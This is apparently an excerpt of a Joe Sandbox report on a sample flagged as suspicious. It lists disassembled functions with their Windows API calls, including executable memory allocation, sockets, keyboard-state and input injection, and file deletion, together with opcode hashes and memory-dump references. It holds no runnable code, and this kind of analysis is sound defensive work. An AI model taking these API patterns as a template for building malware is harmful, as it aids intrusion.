                    • Opcode Fuzzy Hash: d16fe76e306b3fc23c2d1d90b5e1f9d5b96d9d942c05d65e8d8b16be84c221e8
                    • Instruction Fuzzy Hash: D7D01774511717CFD7249F31DA0CA0777E6AF15351B25C83FE596D6690E778C880CA60
                    Function 00791B3E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: LocalTime__swprintf
                    • String ID: %.3d$WIN_XPe
                    • API String ID: 2070861257-2409531811
                    • Opcode ID: 7a45c52b5268c14cfd25f8c07e7500489177bc7c7b94dd6a648c5df9c4910755
                    • Instruction ID: 4153041f3c421e9e46e420aaf466b46c71d24b6275e3b75d4bdea68432a8ea01
                    • Opcode Fuzzy Hash: 7a45c52b5268c14cfd25f8c07e7500489177bc7c7b94dd6a648c5df9c4910755
                    • Instruction Fuzzy Hash: F0D012F580421AEACF459A90EC449FD737DBB08311F9045D2F906D1440F27D9BA4AB25
                    Function 007A76C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 93c0ae50e357456ed23d5767d38b35d594f06d394f1355a14de9f62d7d5ce26a
                    • Instruction ID: 7fee74a42be2072357eb0a47b56ce775a340647552ef3b4da6e72bc198507cc6
                    • Opcode Fuzzy Hash: 93c0ae50e357456ed23d5767d38b35d594f06d394f1355a14de9f62d7d5ce26a
                    • Instruction Fuzzy Hash: 53C17175A04216EFCB18CFA8CC84E6EB7B5FF89710B118699E805EB251D734ED81DB90
                    Function 007CE33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                    Download Yara Rule
                    APIs
                    • CharLowerBuffW.USER32(?,?), ref: 007CE3D2
                    • CharLowerBuffW.USER32(?,?), ref: 007CE415
                      • Part of subcall function 007CDAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 007CDAD9
                    • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 007CE615
                    • _memmove.LIBCMT ref: 007CE628
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: BuffCharLower$AllocVirtual_memmove
                    • String ID:
                    • API String ID: 3659485706-0
                    • Opcode ID: 427b7468282c93288c0deb46583967deac60a64991316f174f37e059ddf1d858
                    • Instruction ID: 3e423ce1cbbdcbf49e95b9fb13f369c4634ecba0879aee33934427fd766bec00
                    • Opcode Fuzzy Hash: 427b7468282c93288c0deb46583967deac60a64991316f174f37e059ddf1d858
                    • Instruction Fuzzy Hash: 8EC17B71608341DFCB14DF28C484A6ABBE4FF88314F14896DF89A9B351D775EA45CB82
                    Function 007C83A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                    Download Yara Rule
                    APIs
                    • CoInitialize.OLE32(00000000), ref: 007C83D8
                    • CoUninitialize.OLE32 ref: 007C83E3
                      • Part of subcall function 007ADA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 007ADAC5
                    • VariantInit.OLEAUT32(?), ref: 007C83EE
                    • VariantClear.OLEAUT32(?), ref: 007C86BF
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                    • String ID:
                    • API String ID: 780911581-0
                    • Opcode ID: 4e8c4e75f80b270125dfbffdb3f387efc032996ea90baa8bb8a81b0196015a22
                    • Instruction ID: c2caa14dbc9c18be54a05ff4bb84aea676f425203c1e5e02b1b8e2d5ec133dc3
                    • Opcode Fuzzy Hash: 4e8c4e75f80b270125dfbffdb3f387efc032996ea90baa8bb8a81b0196015a22
                    • Instruction Fuzzy Hash: B2A1E275204601DFCB50DF24C485B6AB7E4BF88315F18845DFA9AAB3A2CB78ED04CB56
                    Function 007A6DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Variant$AllocClearCopyInitString
                    • String ID:
                    • API String ID: 2808897238-0
                    • Opcode ID: 2b26a799fa8dcdb1121d178601a462c87e07a2304721767e53c7409330e602c6
                    • Instruction ID: 028a25418ff1fb8cc3ddfbf34d06ec2df7dea69197ee10908ee56351a929f00d
                    • Opcode Fuzzy Hash: 2b26a799fa8dcdb1121d178601a462c87e07a2304721767e53c7409330e602c6
                    • Instruction Fuzzy Hash: 7F51E930608301DEDB289F75D895A6AB3E5AF8A310F24891FE656CB291EB7C9840DB11
                    Function 007D9A63 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                    Download Yara Rule
                    APIs
                    • GetWindowRect.USER32(011EECC8,?), ref: 007D9AD2
                    • ScreenToClient.USER32(00000002,00000002), ref: 007D9B05
                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 007D9B72
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Window$ClientMoveRectScreen
                    • String ID:
                    • API String ID: 3880355969-0
                    • Opcode ID: d2e65ee7f1231d38afdbf2e158ebd5f10c620144360da99510d98602b6d57e76
                    • Instruction ID: c965d9728da15dfd94daeccb1556f2a09c8d29c1e3f4798b466d138e5671bcea
                    • Opcode Fuzzy Hash: d2e65ee7f1231d38afdbf2e158ebd5f10c620144360da99510d98602b6d57e76
                    • Instruction Fuzzy Hash: D3511A75A01209EFCF10DF68D880AAE7BB6FF45320F15826AF9559B390D734AD91CB90
                    Function 007C6CBD Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                    Download Yara Rule
                    APIs
                    • socket.WSOCK32(00000002,00000002,00000011), ref: 007C6CE4
                    • WSAGetLastError.WSOCK32(00000000), ref: 007C6CF4
                      • Part of subcall function 00759997: __itow.LIBCMT ref: 007599C2
                      • Part of subcall function 00759997: __swprintf.LIBCMT ref: 00759A0C
                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 007C6D58
                    • WSAGetLastError.WSOCK32(00000000), ref: 007C6D64
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ErrorLast$__itow__swprintfsocket
                    • String ID:
                    • API String ID: 2214342067-0
                    • Opcode ID: 44b515b77ecb48b2e7f63377eb85a6ddb68445d163df3051b7c2bda0d5f0be60
                    • Instruction ID: 6d080084b3b37722c6fa8967244faaaae4d36b566f3e26884de5cf8a6771e696
                    • Opcode Fuzzy Hash: 44b515b77ecb48b2e7f63377eb85a6ddb68445d163df3051b7c2bda0d5f0be60
                    • Instruction Fuzzy Hash: FC417F74740200EFEB10AF24DC8AFAA77E59B44B10F44C01DFA5AAB2D2DBB99D048791
                    Function 007C672D Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                    Download Yara Rule
                    APIs
                    • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,007DF910), ref: 007C67BA
                    • _strlen.LIBCMT ref: 007C67EC
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: _strlen
                    • String ID:
                    • API String ID: 4218353326-0
                    • Opcode ID: 289e8e417313eb750db38a055378d6c5f0afd3df140a293cb0bce60e122b0fb1
                    • Instruction ID: ffbbede0cb682cf346fae99ffb09c6b9eaefc540bd68be0358906361139fcbea
                    • Opcode Fuzzy Hash: 289e8e417313eb750db38a055378d6c5f0afd3df140a293cb0bce60e122b0fb1
                    • Instruction Fuzzy Hash: 0F417F71A00104EBCB14EB64DCD9FEEB7E9AF48314F14816DF91A9B292EB78AD04C751
                    Function 007BBA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                    Download Yara Rule
                    APIs
                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 007BBB09
                    • GetLastError.KERNEL32(?,00000000), ref: 007BBB2F
                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 007BBB54
                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 007BBB80
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: CreateHardLink$DeleteErrorFileLast
                    • String ID:
                    • API String ID: 3321077145-0
                    • Opcode ID: 42e918252617c19cab73c7291bd9fc9d56f9d982a7436004f49c2dd40088ee07
                    • Instruction ID: ad5948a94a3a73e53fa130cd9e51329978f243a3a7f3251f6b9ce4230382f1cd
                    • Opcode Fuzzy Hash: 42e918252617c19cab73c7291bd9fc9d56f9d982a7436004f49c2dd40088ee07
                    • Instruction Fuzzy Hash: 0B412839600610DFCB10EF14C588A9DBBE5AF89310B09C489ED4A9B362CB78FD05CB91
                    Function 007D8AC0 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                    Download Yara Rule
                    APIs
                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007D8B4D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: InvalidateRect
                    • String ID:
                    • API String ID: 634782764-0
                    • Opcode ID: 2c8f5088c9805dbd0ddfa745ee33ec0d171177e40001dd750c19229882dd49a6
                    • Instruction ID: c091149ad823ca6c17490ca709d449ce189c61efc4fb9cdca544ab95c24254b4
                    • Opcode Fuzzy Hash: 2c8f5088c9805dbd0ddfa745ee33ec0d171177e40001dd750c19229882dd49a6
                    • Instruction Fuzzy Hash: 6531B2F4600204BFEBA19B18CC45FA937B4FB05310F248A17FA52D63A1DE39A9509A52
                    Function 007DADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                    Download Yara Rule
                    APIs
                    • ClientToScreen.USER32(?,?), ref: 007DAE1A
                    • GetWindowRect.USER32(?,?), ref: 007DAE90
                    • PtInRect.USER32(?,?,007DC304), ref: 007DAEA0
                    • MessageBeep.USER32(00000000), ref: 007DAF11
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Rect$BeepClientMessageScreenWindow
                    • String ID:
                    • API String ID: 1352109105-0
                    • Opcode ID: 1cd8342389a8fac8bf68d20d05f08d8b1ec4c77fee28d1b8f99d480a5b9ca388
                    • Instruction ID: c5ada62b64e827cd3d8e215b72421b92cbd67095ec2e18fd489bc9c63c29393c
                    • Opcode Fuzzy Hash: 1cd8342389a8fac8bf68d20d05f08d8b1ec4c77fee28d1b8f99d480a5b9ca388
                    • Instruction Fuzzy Hash: A5417B70600219EFCB11CF58C885BA9BBF5FF48350F1881BAE8559B351D734E942DB92
                    Function 007B0FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                    Download Yara Rule
                    APIs
                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 007B1037
                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 007B1053
                    • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 007B10B9
                    • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 007B110B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: KeyboardState$InputMessagePostSend
                    • String ID:
                    • API String ID: 432972143-0
                    • Opcode ID: a8f9535e804290cbaac6f3c3d0f597245d99444dc1633f75412c2df5584f6b0b
                    • Instruction ID: 27588c8fe436c5a5cc1cab12e02c17662970513e9583cb4b98b56cc3f06cb76c
                    • Opcode Fuzzy Hash: a8f9535e804290cbaac6f3c3d0f597245d99444dc1633f75412c2df5584f6b0b
                    • Instruction Fuzzy Hash: 13314B30E4068CEEFB309B698C297FABBA9AB45310FC4422AF591521D1C37C89D09765
                    Function 007B1121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                    Download Yara Rule
                    APIs
                    • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 007B1176
                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 007B1192
                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 007B11F1
                    • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 007B1243
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: KeyboardState$InputMessagePostSend
                    • String ID:
                    • API String ID: 432972143-0
                    • Opcode ID: 0b23d4a61c9f3462b1e2b0b2a1ae2c9ac575ce7e2974371920cf263585499dbb
                    • Instruction ID: ab7c9586e0d9f5dfdb8bf9ad3dded3912ec02e734ac1dc627987d6841ef6ed3a
                    • Opcode Fuzzy Hash: 0b23d4a61c9f3462b1e2b0b2a1ae2c9ac575ce7e2974371920cf263585499dbb
                    • Instruction Fuzzy Hash: CB312830A4060C9AEF248A698C297FA7BBAAB49310FC4835BF691921D1C33C89559755
                    Function 00786415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0078644B
                    • __isleadbyte_l.LIBCMT ref: 00786479
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 007864A7
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 007864DD
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                    • String ID:
                    • API String ID: 3058430110-0
                    • Opcode ID: a52e3aa6066e9a6cb5ee625caded7360d6177d510a3c7529d437ea154bd79aa3
                    • Instruction ID: bc3b1c78b8e754ae3c09c3eb4e4d12f84d53b904c4ac7bab0a960322084e28a3
                    • Opcode Fuzzy Hash: a52e3aa6066e9a6cb5ee625caded7360d6177d510a3c7529d437ea154bd79aa3
                    • Instruction Fuzzy Hash: D031E131640286FFDF21AF64CC45BAE7BB5FF40360F154029E85987191E739DA50DB90
                    Function 007D5175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                    Download Yara Rule
                    APIs
                    • GetForegroundWindow.USER32 ref: 007D5189
                      • Part of subcall function 007B387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 007B3897
                      • Part of subcall function 007B387D: GetCurrentThreadId.KERNEL32 ref: 007B389E
                      • Part of subcall function 007B387D: AttachThreadInput.USER32(00000000,?,007B52A7), ref: 007B38A5
                    • GetCaretPos.USER32(?), ref: 007D519A
                    • ClientToScreen.USER32(00000000,?), ref: 007D51D5
                    • GetForegroundWindow.USER32 ref: 007D51DB
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                    • String ID:
                    • API String ID: 2759813231-0
                    • Opcode ID: 6ce921e347df28cbf920a00fbbd7a99d395e85cfd11377e01af659698aa51b2d
                    • Instruction ID: ee6577b409299a8a22ee52534657a93e01db0ba6f55a62cd00276538e15adc22
                    • Opcode Fuzzy Hash: 6ce921e347df28cbf920a00fbbd7a99d395e85cfd11377e01af659698aa51b2d
                    • Instruction Fuzzy Hash: 40310371D00108EFDB00EFA5C8459EFB7F9EF54300F10846AE916E7241DA799E45CBA1
                    Function 007DC788 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
                    • GetCursorPos.USER32(?), ref: 007DC7C2
                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0078BBFB,?,?,?,?,?), ref: 007DC7D7
                    • GetCursorPos.USER32(?), ref: 007DC824
                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0078BBFB,?,?,?), ref: 007DC85E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                    • String ID:
                    • API String ID: 2864067406-0
                    • Opcode ID: 6932b289cc2efdc15d531688da6272236f4abade2383d6e30c901b16efb5b8cd
                    • Instruction ID: 3e15fb40baebcffc30920b6ca75b808c8575c0e2805524fc4966dcb3e39f3a22
                    • Opcode Fuzzy Hash: 6932b289cc2efdc15d531688da6272236f4abade2383d6e30c901b16efb5b8cd
                    • Instruction Fuzzy Hash: 1931A835600018EFCB16CF98D898EEA7BBAFF49310F04416AF9468B261D7395D61EF60
                    Function 00770BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                    Download Yara Rule
                    APIs
                    • __setmode.LIBCMT ref: 00770BF2
                      • Part of subcall function 00755B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,007B7B20,?,?,00000000), ref: 00755B8C
                      • Part of subcall function 00755B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,007B7B20,?,?,00000000,?,?), ref: 00755BB0
                    • _fprintf.LIBCMT ref: 00770C29
                    • OutputDebugStringW.KERNEL32(?), ref: 007A6331
                      • Part of subcall function 00774CDA: _flsall.LIBCMT ref: 00774CF3
                    • __setmode.LIBCMT ref: 00770C5E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
